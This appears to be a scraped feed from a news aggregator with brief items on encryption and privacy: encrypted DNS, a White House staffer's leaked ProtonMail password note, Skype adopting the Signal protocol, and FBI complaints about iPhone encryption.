DNS services are the phone books of the Internet, providing the actual Internet Protocol (IP) network address associated with websites’ and other Internet services’ host and domain names. They turn arstechnica.com into 50.31.169.131, for example. Your Internet provider offers up DNS as part of your service, but your provider could also log your DNS traffic—in essence, recording your entire browsing history.

“Open” DNS services provide a way of bypassing ISPs’ services for reasons of privacy and security—and in some places, evading content filtering, surveillance, and censorship. And on April 1 (not a joke), Cloudflare launched its own new, free high-performance authoritative DNS service designed to enhance users’ privacy on the Internet. This new offering also promised a way to hide DNS traffic completely from view—encryption.

Read 58 remaining paragraphs | Comments

]]>
https://briefnews.eu/how-to-keep-your-isps-nose-out-of-your-browser-history-with-encrypted-dns/feed/ 0
White House staffer left encrypted email passwords at bus stop – report https://briefnews.eu/white-house-staffer-left-encrypted-email-passwords-at-bus-stop-report/ https://briefnews.eu/white-house-staffer-left-encrypted-email-passwords-at-bus-stop-report/#respond Sun, 18 Mar 2018 05:29:19 +0000 http://briefnews.eu/white-house-staffer-left-encrypted-email-passwords-at-bus-stop-report/

A White House employee carelessly left his encrypted email password at a bus stop, according to a report. A picture of the bootprint-smeared note was posted online.

White House staffer Ryan McAvoy left his ProtonMail account and passwords at a bus stop near his office, news outlet The Intercept reported Saturday. A source noticed the information written on a piece of White House stationery and handed it in.

The Intercept says it has confirmed the document’s authenticity and requested a statement from McAvoy. However, no response has been given yet.

ProtonMail is an end-to-end encrypted email service developed at the European Council for Nuclear Research (CERN) based in Geneva, Switzerland. While it boasts“zero access architecture”, meaning that no one can access personal data without proper decryption keys, the technology cannot prevent circumstances like this from compromising it.

House Democrats hunting for evidence of collusion between US President Donald Trump’s 2016 campaign and Russia have recently released a memo demanding a subpoena to get information of downloads and use of encrypted messaging apps by Trump associates. Their suggestions include “SMS, iMessage, Whatsapp, Facebook Messenger, Signal, Slack, Instagram, and Snapchat”. ProtonMail is off the list for now, but it may be added after McAvoy’s mishap, The Intercept suggests.

The memo was released days after the Republican-led House Intelligence Committee concluded on Monday that it found no definitive evidence that Trump’s campaign colluded with Russia during the 2016 election cycle. Democrats on the committee immediately rose up in protest.

Let’s block ads! (Why?)

]]>
https://briefnews.eu/white-house-staffer-left-encrypted-email-passwords-at-bus-stop-report/feed/ 0
Skype Introduces End-to-End Encrypted Texts and Voice https://briefnews.eu/skype-introduces-end-to-end-encrypted-texts-and-voice/ https://briefnews.eu/skype-introduces-end-to-end-encrypted-texts-and-voice/#respond Fri, 12 Jan 2018 09:35:53 +0000 http://briefnews.eu/skype-introduces-end-to-end-encrypted-texts-and-voice/ After years of lingering questions about Skype’s commitment to protecting user data, it will soon offer end-to-end encryption to its 300 million monthly users.


https://media.wired.com/photos/5a57d5c132a3cf2efe531abe/master/pass/skype_encrypted2-01.png

]]>
https://briefnews.eu/skype-introduces-end-to-end-encrypted-texts-and-voice/feed/ 0
Skype is adding an option for encrypted conversations https://briefnews.eu/skype-is-adding-an-option-for-encrypted-conversations/ https://briefnews.eu/skype-is-adding-an-option-for-encrypted-conversations/#respond Thu, 11 Jan 2018 19:40:15 +0000 http://briefnews.eu/skype-is-adding-an-option-for-encrypted-conversations/

Soon, your chats on Skype can be just as secure as conversations on Signal, the service used by US Senators. Microsoft is integrating the open source Signal protocol, used by WhatsApp, Google, Facebook and Signal itself, into test versions of Skype as ‘Private Conversations‘ for end-to-end encrypted communications.

There are a few restrictions: You can’t turn an existing chat into a Private Conversation, and must start each one by sending a request to one of your contacts. They don’t carry over between devices, so if you switch platforms, you’ll have to send a whole new request. And finally, Private Conversations are currently available in preview only for Skype Insiders, the service’s beta tester community.

Via: Windows Central

Source: Signal blog, Skype: Private Conversations

]]>
https://briefnews.eu/skype-is-adding-an-option-for-encrypted-conversations/feed/ 0
FBI security expert: Apple are “jerks” about unlocking encrypted phones https://briefnews.eu/fbi-security-expert-apple-are-jerks-about-unlocking-encrypted-phones/ https://briefnews.eu/fbi-security-expert-apple-are-jerks-about-unlocking-encrypted-phones/#respond Thu, 11 Jan 2018 17:41:03 +0000 http://briefnews.eu/fbi-security-expert-apple-are-jerks-about-unlocking-encrypted-phones/

Enlarge (credit: Getty Images | Boonrit Panyaphinitnugoon)

Federal Bureau of Investigation officials are continuing to voice their displeasure with Apple’s approach to iPhone security, with one FBI official reportedly calling the company “jerks” and an “evil genius” this week.

Apple has repeatedly made it more difficult to access data on encrypted iPhones, making Apple customers safer from hackers but also preventing the FBI from breaking into phones used by suspected criminals.

“At what point is it just trying to one-up things and at what point is it to thwart law enforcement?” FBI forensic expert Stephen Flatley said yesterday while speaking at the International Conference on Cyber Security in Manhattan, according to a report by Motherboard. “Apple is pretty good at evil genius stuff.”

Read 14 remaining paragraphs | Comments

]]>
https://briefnews.eu/fbi-security-expert-apple-are-jerks-about-unlocking-encrypted-phones/feed/ 0